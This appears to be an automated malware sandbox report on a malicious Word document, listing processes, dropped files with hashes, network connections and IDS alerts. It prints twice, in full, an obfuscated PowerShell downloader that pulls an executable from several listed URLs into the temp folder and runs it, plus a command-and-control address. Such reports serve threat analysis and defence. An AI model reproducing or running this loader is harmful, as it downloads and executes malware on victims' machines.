2772C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $c9711='n8464';$q4581=new-object Net.WebClient;$a2004='http://agatawierzbicka.com//MdM5N5SCi@http://docsdetector.xyz/9YYxTl9SX@http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx@http://wv-meat.nl/XdL0kQQar@http://www.stinson.nl/O9oOxW9Dg8'.Split('@');$w9953='m2773';$q1130 = '422';$o9383='n8603';$l2714=$env:temp+'\'+$q1130+'.exe';foreach($i5753 in $a2004){try{$q4581.DownloadFile($i5753, $l2714);$p9921='v345';If ((Get-Item $l2714).length -ge 40000) {Invoke-Item $l2714;$f3020='p9690';break;}}catch{}}$w5101='c4211';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2868cmd.exeC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3236powershell $c9711='n8464';$q4581=new-object Net.WebClient;$a2004='http://agatawierzbicka.com//MdM5N5SCi@http://docsdetector.xyz/9YYxTl9SX@http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx@http://wv-meat.nl/XdL0kQQar@http://www.stinson.nl/O9oOxW9Dg8'.Split('@');$w9953='m2773';$q1130 = '422';$o9383='n8603';$l2714=$env:temp+'\'+$q1130+'.exe';foreach($i5753 in $a2004){try{$q4581.DownloadFile($i5753, $l2714);$p9921='v345';If ((Get-Item $l2714).length -ge 40000) {Invoke-Item $l2714;$f3020='p9690';break;}}catch{}}$w5101='c4211';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2396"C:\Users\admin\AppData\Local\Temp\422.exe" C:\Users\admin\AppData\Local\Temp\422.exepowershell.exe
User:
admin
Company:
Networks Associates Technology, Inc
Integrity Level:
MEDIUM
Exit code:
0
Version:
8, 0, 0, 26
3068"C:\Users\admin\AppData\Local\Temp\422.exe"C:\Users\admin\AppData\Local\Temp\422.exe
422.exe
User:
admin
Company:
Networks Associates Technology, Inc
Integrity Level:
MEDIUM
Exit code:
0
Version:
8, 0, 0, 26
2572"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe422.exe
User:
admin
Company:
Networks Associates Technology, Inc
Integrity Level:
MEDIUM
Exit code:
0
Version:
8, 0, 0, 26
Total events
2 159
Read events
1 677
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6CC4.tmp.cvr
MD5:
SHA256:
2672WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51AFE216.jpg
MD5:
SHA256:
3236powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OI8FXJPB5AJ1KEDKANLC.temp
MD5:
SHA256:
3236powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247b5b.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3236powershell.exeC:\Users\admin\AppData\Local\Temp\422.exeexecutable
MD5:4EDAB722825EAC006D2D2FFC49B5DF50
SHA256:278EDAF4D066D5BBAB721D74664181BB8F67F1AFFC29E8B2BC9B66B50566F8E2
2672WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C569802DB5849779F22174B9AB0F135F
SHA256:6C3CAD88468FE63910B07989B21F7D4FABE3C3BD098CFFAF6E32CA3A869558B7
2672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$019-01.xmlpgc
MD5:AF626B5FFEDD638D547BF9DF8D369FB9
SHA256:1792B5CE3CD8F3DD14E88856397B9E82F0CF0A92794C8B332D74C013AB827F87
3068422.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:4EDAB722825EAC006D2D2FFC49B5DF50
SHA256:278EDAF4D066D5BBAB721D74664181BB8F67F1AFFC29E8B2BC9B66B50566F8E2
3236powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:0A8E78F11D13A705DE736D4A9E5A7635
SHA256:8D4F52801AAF8AAA79B2BE36FAC418F9AF111DF0C0195161FCA5BAD7CC98314C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3072
wabmetagen.exe
GET
190.55.123.250:80
http://190.55.123.250/
AR
malicious
3236
powershell.exe
GET
200
46.242.177.30:80
http://agatawierzbicka.com/MdM5N5SCi/
PL
executable
348 Kb
suspicious
3236
powershell.exe
GET
301
46.242.177.30:80
http://agatawierzbicka.com//MdM5N5SCi
PL
html
245 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3072
wabmetagen.exe
190.55.123.250:80
Telecentro S.A.
AR
malicious
3236
powershell.exe
46.242.177.30:80
agatawierzbicka.com
home.pl S.A.
PL
suspicious

DNS requests

Domain
IP
Reputation
agatawierzbicka.com
  • 46.242.177.30
suspicious

Threats

PID
Process
Class
Message
3236
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3236
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3236
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info